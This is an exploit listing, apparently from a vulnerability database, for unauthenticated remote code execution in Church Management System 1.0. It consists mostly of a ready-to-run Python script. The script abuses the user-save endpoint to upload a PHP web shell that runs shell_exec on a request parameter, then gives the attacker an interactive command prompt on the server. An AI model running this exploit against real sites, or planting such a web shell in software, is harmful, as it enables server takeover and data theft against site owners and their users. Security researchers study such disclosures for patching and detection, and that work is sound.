Church Management System (CMS-Website) - Unauthenticated RCE

2021.09.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Church Management System (CMS-Website) - Unauthenticated RCE # Exploit Author: Abdullah Khawaja # Date: 2021-09-17 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Version: 1.0 # Tested On: Linux + XAMPP 7.4.4 # Description: Church Management System (CMS-Website) 1.0 - Unauthenticated Remote Code Execution #Step 1: run the exploit in python with this command: python3 exploit.py #Step 2: Input the URL of the vulnerable application: Example: http://192.168.10.11/church_management/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) print(r""" .----------. .-''-. / / . __ __ ___ .' .-. ) / ______.' .'| | |/ `.' `. / .' / / / /_ .' | | .-. .-. ' (_/ / / / '''--. < | __ __ | | | | | | ,.----------. / / '___ `. | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' '------' '---'`--' `" `--' `" ( _.-' abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) shell_upload = True if("Undefined index: id in" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top